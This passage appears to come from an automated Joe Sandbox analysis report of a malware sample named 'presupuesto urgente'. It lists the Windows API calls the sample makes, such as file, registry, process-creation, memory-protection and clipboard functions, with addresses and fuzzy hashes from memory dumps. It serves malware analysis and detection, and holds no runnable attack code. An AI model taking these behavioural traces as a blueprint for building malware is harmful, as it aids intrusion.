                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1375471231-0
                                                                                                                                                      • Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                                                                      • Instruction ID: a0b70af09676f49ae35af12b400ff138e6ea5c47fed9fef2c083bef2843b0e9d
                                                                                                                                                      • Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                                                                      • Instruction Fuzzy Hash: 97C04C71255506DADB105F31DE08F1B7A50AB60751F11843AA18AE51B0DA348455DD2D
                                                                                                                                                      APIs
                                                                                                                                                      • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402807
                                                                                                                                                        • Part of subcall function 004062F7: wsprintfW.USER32 ref: 00406304
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FilePointerwsprintf
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 327478801-0
                                                                                                                                                      • Opcode ID: df39207a0041021f90c9c5904dee6126a22bdfdf8dd6c18872903947b59110e0
                                                                                                                                                      • Instruction ID: 55fb61e46e544c01c8f838511187bb9fe83791c0a23b57862087ec8cac53259a
                                                                                                                                                      • Opcode Fuzzy Hash: df39207a0041021f90c9c5904dee6126a22bdfdf8dd6c18872903947b59110e0
                                                                                                                                                      • Instruction Fuzzy Hash: EDE09271A00104AFDB11EBA5AF499AE7779DB80304B14407FF501F11D2CB790D52DE2E
                                                                                                                                                      APIs
                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040233D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: PrivateProfileStringWrite
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 390214022-0
                                                                                                                                                      • Opcode ID: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                                                                                                                      • Instruction ID: f718b570c03cd879152723008abd35f840e0595a9afadee28286a7759bd10add
                                                                                                                                                      • Opcode Fuzzy Hash: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                                                                                                                      • Instruction Fuzzy Hash: A1E086719042686EE7303AF10F8EDBF50989B44348B55093FBA01B61C2D9FC0D46826D
                                                                                                                                                      APIs
                                                                                                                                                      • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406274
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Create
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                                      • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                                                      • Instruction ID: 479e159ceda2cb7b50184963f42fe168e38793edbf0b306f3e9e40cefa011f94
                                                                                                                                                      • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                                                      • Instruction Fuzzy Hash: F5E0E672010109BEEF195F50DD0AD7B371DE704314F01452EFA07E4051E6B5A9305734
                                                                                                                                                      APIs
                                                                                                                                                      • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040D022,0040CED0,004033C2,0040CED0,0040D022,00414ED0,00004000,?,00000000,004031EC,00000004), ref: 00405F68
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileWrite
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                                      • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                                      • Instruction ID: 6078229a914e39b74a0c5ece066be2a5834b756046c3aff4b734283800ecbe33
                                                                                                                                                      • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                                      • Instruction Fuzzy Hash: 2DE0EC3221065EABDF109EA59C00EEB7B6CFB053A0F004437FD25E3150D775E9219BA8
                                                                                                                                                      APIs
                                                                                                                                                      • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040343E,0040A230,0040A230,00403342,00414ED0,00004000,?,00000000,004031EC), ref: 00405F39
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileRead
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                      • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                                      • Instruction ID: 9b2ea83f702eb3fffeb4c264c614e4c5cb206e28bf88f3110778221d7db1fef5
                                                                                                                                                      • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                                      • Instruction Fuzzy Hash: D7E08C3220021AEBCF109F508C00EEB3B6CEB04360F004472F925E2180E234E8219FA8
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E0
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8114030407.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8113998987.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8114063244.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8114087670.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_10000000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                      • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                                                      • Instruction ID: 43a77b614ff4017466e57d7f63f0e44ab05d53355a3bca00642047650885b550
                                                                                                                                                      • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                                                      • Instruction Fuzzy Hash: C5F0A5F15057A0DEF350DF688C847063BE4E3583C4B03852AE368F6269EB344454DF19
                                                                                                                                                      APIs
                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,00422708,?,?,004062AB,00422708,00000000,?,?,Call,?), ref: 00406241
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Open
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 71445658-0
                                                                                                                                                      • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                                      • Instruction ID: 3024dc78f91217c8ac754af2bee00b96045fdb9f0f4599777b3fb0e88d8c22ab
                                                                                                                                                      • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                                      • Instruction Fuzzy Hash: 8AD0123200020DBBDF116E919D05FAB371DEB04310F014426FE16A4091D775D530AB15
                                                                                                                                                      APIs
                                                                                                                                                      • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                      • Opcode ID: 29d25e4036f002882842ff2abbc33b1b61682e4b1f0e1c41cb6674e83b655918
                                                                                                                                                      • Instruction ID: 608ef69ca2b13f27eda1cfcd16162797e0d7c1effb02ba883df1ee114d760796
                                                                                                                                                      • Opcode Fuzzy Hash: 29d25e4036f002882842ff2abbc33b1b61682e4b1f0e1c41cb6674e83b655918
                                                                                                                                                      • Instruction Fuzzy Hash: 44D01272B04104DBDB21DBA4AF0859D73A59B10364B204677E101F11D1DAB989559A1D
                                                                                                                                                      APIs
                                                                                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313F,?), ref: 0040344F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                      • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                                      • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                                                                                      • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                                      • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00405414: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                                                                                                                        • Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                                                                                                                        • Part of subcall function 00405414: lstrcatW.KERNEL32(00422708,00402EEC,00402EEC,00422708,00000000,00000000,00000000), ref: 0040546F
                                                                                                                                                        • Part of subcall function 00405414: SetWindowTextW.USER32(00422708,00422708), ref: 00405481
                                                                                                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                                                                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                                                                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                                                                                                                        • Part of subcall function 00405995: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059BE
                                                                                                                                                        • Part of subcall function 00405995: CloseHandle.KERNEL32(?), ref: 004059CB
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F47
                                                                                                                                                        • Part of subcall function 0040683B: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040684C
                                                                                                                                                        • Part of subcall function 0040683B: GetExitCodeProcess.KERNEL32(?,?), ref: 0040686E
                                                                                                                                                        • Part of subcall function 004062F7: wsprintfW.USER32 ref: 00406304
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2972824698-0
                                                                                                                                                      • Opcode ID: b4474b7c365b70f9dc7c58f3b4c8f6c607978000052ce3e09dedc8896c81aea9
                                                                                                                                                      • Instruction ID: 78872c6594437c8f6fb94a475087433cb7c5ddb6828dda6eb17a8edff69df0b5
                                                                                                                                                      • Opcode Fuzzy Hash: b4474b7c365b70f9dc7c58f3b4c8f6c607978000052ce3e09dedc8896c81aea9
                                                                                                                                                      • Instruction Fuzzy Hash: 93F0F072905021DBCB20FBA58E848DE72B09F01328B2101BFF101F21D1C77C0E418AAE
                                                                                                                                                      APIs
                                                                                                                                                      • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Sleep
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3472027048-0
                                                                                                                                                      • Opcode ID: cb92cf7ccb1965bdce3badc7d49dd673c55c158fa478f1f9cab94f81649d65d9
                                                                                                                                                      • Instruction ID: adf76bd272608bb1b99769d9a9b05885636640fbfa2c3f91bbd7a8ebdab0685d
                                                                                                                                                      • Opcode Fuzzy Hash: cb92cf7ccb1965bdce3badc7d49dd673c55c158fa478f1f9cab94f81649d65d9
                                                                                                                                                      • Instruction Fuzzy Hash: 45D0A773F141008BD720EBB8BE8945E73F8E7803193208837E102F11D1E578C8928A2D
                                                                                                                                                      APIs
                                                                                                                                                      • GetDlgItem.USER32(?,00000403), ref: 004055B1
                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004055C0
                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004055FD
                                                                                                                                                      • GetSystemMetrics.USER32(00000002), ref: 00405604
                                                                                                                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405625
                                                                                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405636
                                                                                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405649
                                                                                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405657
                                                                                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040566A
                                                                                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040568C
                                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 004056A0
                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004056C1
                                                                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004056D1
                                                                                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004056EA
                                                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004056F6
                                                                                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 004055CF
                                                                                                                                                        • Part of subcall function 0040437A: SendMessageW.USER32(00000028,?,00000001,004041A5), ref: 00404388
                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405713
                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000054E7,00000000), ref: 00405721
                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00405728
                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 0040574C
                                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405751
                                                                                                                                                      • ShowWindow.USER32(00000008), ref: 0040579B
                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057CF
                                                                                                                                                      • CreatePopupMenu.USER32 ref: 004057E0
                                                                                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004057F4
                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00405814
                                                                                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040582D
                                                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405865
                                                                                                                                                      • OpenClipboard.USER32(00000000), ref: 00405875
                                                                                                                                                      • EmptyClipboard.USER32 ref: 0040587B
